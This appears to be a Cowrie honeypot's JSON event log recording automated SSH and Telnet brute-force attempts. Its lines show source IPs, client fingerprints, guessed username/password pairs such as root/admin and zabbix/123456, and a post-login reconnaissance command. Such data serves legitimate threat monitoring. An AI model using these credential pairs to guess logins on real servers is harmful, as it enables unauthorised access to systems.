{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/45d2cb1942e2d2388cb7c58240d2668b92486bfe59f0512a78f81eef19ffcd6f","size":1819,"shasum":"45d2cb1942e2d2388cb7c58240d2668b92486bfe59f0512a78f81eef19ffcd6f","duplicate":false,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/45d2cb1942e2d2388cb7c58240d2668b92486bfe59f0512a78f81eef19ffcd6f after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.727022Z","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.session.closed","duration":2.603046178817749,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.731617Z","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40270,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7112d75a81","protocol":"ssh","message":"New connection: 212.227.125.160:40270 (1.2.3.4:22) [session: 6f7112d75a81]","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.916769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.917542Z","src_ip":"212.227.125.160","session":"6f7112d75a81"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.992080Z","src_ip":"212.227.125.160","session":"6f7112d75a81"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:44.216681Z","src_ip":"212.227.125.160","session":"6f7112d75a81"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:45.363301Z","src_ip":"212.227.125.160","session":"6f7112d75a81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43182,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c946b647c01","protocol":"ssh","message":"New connection: 212.227.125.160:43182 (1.2.3.4:22) [session: 8c946b647c01]","sensor":"my-vps","timestamp":"2025-08-31T00:53:54.327605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:54.329491Z","src_ip":"212.227.125.160","session":"8c946b647c01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:54.404758Z","src_ip":"212.227.125.160","session":"8c946b647c01"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:54.624960Z","src_ip":"212.227.125.160","session":"8c946b647c01"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:55.740584Z","src_ip":"212.227.125.160","session":"8c946b647c01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46904,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9ffe5de9e30","protocol":"ssh","message":"New connection: 212.227.125.160:46904 (1.2.3.4:22) [session: e9ffe5de9e30]","sensor":"my-vps","timestamp":"2025-08-31T00:54:04.812731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:04.825392Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:04.887569Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:54:05.288377Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:54:05.552711Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:54:05.553518Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:05.630405Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:05.631900Z","src_ip":"212.227.125.160","session":"e9ffe5de9e30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43044,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbcaef24bda6","protocol":"ssh","message":"New connection: 212.227.125.160:43044 (1.2.3.4:22) [session: fbcaef24bda6]","sensor":"my-vps","timestamp":"2025-08-31T00:54:15.231432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:15.232438Z","src_ip":"212.227.125.160","session":"fbcaef24bda6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:15.308026Z","src_ip":"212.227.125.160","session":"fbcaef24bda6"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:15.532343Z","src_ip":"212.227.125.160","session":"fbcaef24bda6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:16.695385Z","src_ip":"212.227.125.160","session":"fbcaef24bda6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53316,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee6e6268e5c6","protocol":"ssh","message":"New connection: 212.227.235.229:53316 (1.2.3.4:22) [session: ee6e6268e5c6]","sensor":"my-vps","timestamp":"2025-08-31T00:54:18.418242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:19.561011Z","src_ip":"212.227.235.229","session":"ee6e6268e5c6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:54:19.561791Z","src_ip":"212.227.235.229","session":"ee6e6268e5c6"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc123","message":"login attempt [daemon/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:24.490890Z","src_ip":"212.227.235.229","session":"ee6e6268e5c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60098,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e1a306560c7","protocol":"ssh","message":"New connection: 212.227.125.160:60098 (1.2.3.4:22) [session: 7e1a306560c7]","sensor":"my-vps","timestamp":"2025-08-31T00:54:25.658198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:25.659124Z","src_ip":"212.227.125.160","session":"7e1a306560c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:25.733970Z","src_ip":"212.227.125.160","session":"7e1a306560c7"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:26.002510Z","src_ip":"212.227.125.160","session":"7e1a306560c7"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:26.416676Z","src_ip":"212.227.235.229","session":"ee6e6268e5c6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:27.131834Z","src_ip":"212.227.125.160","session":"7e1a306560c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56374,"dst_ip":"1.2.3.4","dst_port":23,"session":"252a21f15c9b","protocol":"telnet","message":"New connection: 212.227.125.160:56374 (1.2.3.4:23) [session: 252a21f15c9b]","sensor":"my-vps","timestamp":"2025-08-31T00:54:32.846869Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:54:32.930960Z","src_ip":"212.227.125.160","session":"252a21f15c9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:54:32.946606Z","src_ip":"212.227.125.160","session":"252a21f15c9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44043,"dst_ip":"1.2.3.4","dst_port":23,"session":"098f8ed7e33a","protocol":"telnet","message":"New connection: 212.227.235.229:44043 (1.2.3.4:23) [session: 098f8ed7e33a]","sensor":"my-vps","timestamp":"2025-08-31T00:54:33.635592Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36306,"dst_ip":"1.2.3.4","dst_port":22,"session":"69ccdd76f009","protocol":"ssh","message":"New connection: 212.227.235.229:36306 (1.2.3.4:22) [session: 69ccdd76f009]","sensor":"my-vps","timestamp":"2025-08-31T00:54:34.245086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:54:34.246075Z","src_ip":"212.227.235.229","session":"69ccdd76f009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:54:34.313322Z","src_ip":"212.227.235.229","session":"69ccdd76f009"}
{"eventid":"cowrie.login.failed","username":"ops","password":"1","message":"login attempt [ops/1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:34.617257Z","src_ip":"212.227.235.229","session":"69ccdd76f009"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:35.685906Z","src_ip":"212.227.235.229","session":"69ccdd76f009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39880,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b89b2cda8f","protocol":"ssh","message":"New connection: 212.227.125.160:39880 (1.2.3.4:22) [session: b3b89b2cda8f]","sensor":"my-vps","timestamp":"2025-08-31T00:54:36.058117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:36.059052Z","src_ip":"212.227.125.160","session":"b3b89b2cda8f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:36.132332Z","src_ip":"212.227.125.160","session":"b3b89b2cda8f"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:36.353317Z","src_ip":"212.227.125.160","session":"b3b89b2cda8f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:37.447849Z","src_ip":"212.227.125.160","session":"b3b89b2cda8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40256,"dst_ip":"1.2.3.4","dst_port":22,"session":"270d473aaa07","protocol":"ssh","message":"New connection: 212.227.235.229:40256 (1.2.3.4:22) [session: 270d473aaa07]","sensor":"my-vps","timestamp":"2025-08-31T00:54:40.150902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:54:40.153813Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:54:40.395613Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44322,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd146bae9005","protocol":"ssh","message":"New connection: 212.227.125.160:44322 (1.2.3.4:22) [session: bd146bae9005]","sensor":"my-vps","timestamp":"2025-08-31T00:54:40.980798Z"}
{"eventid":"cowrie.login.success","username":"root","password":"web2","message":"login attempt [root/web2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:54:41.352270Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:41.436864Z","src_ip":"212.227.125.160","session":"bd146bae9005"}
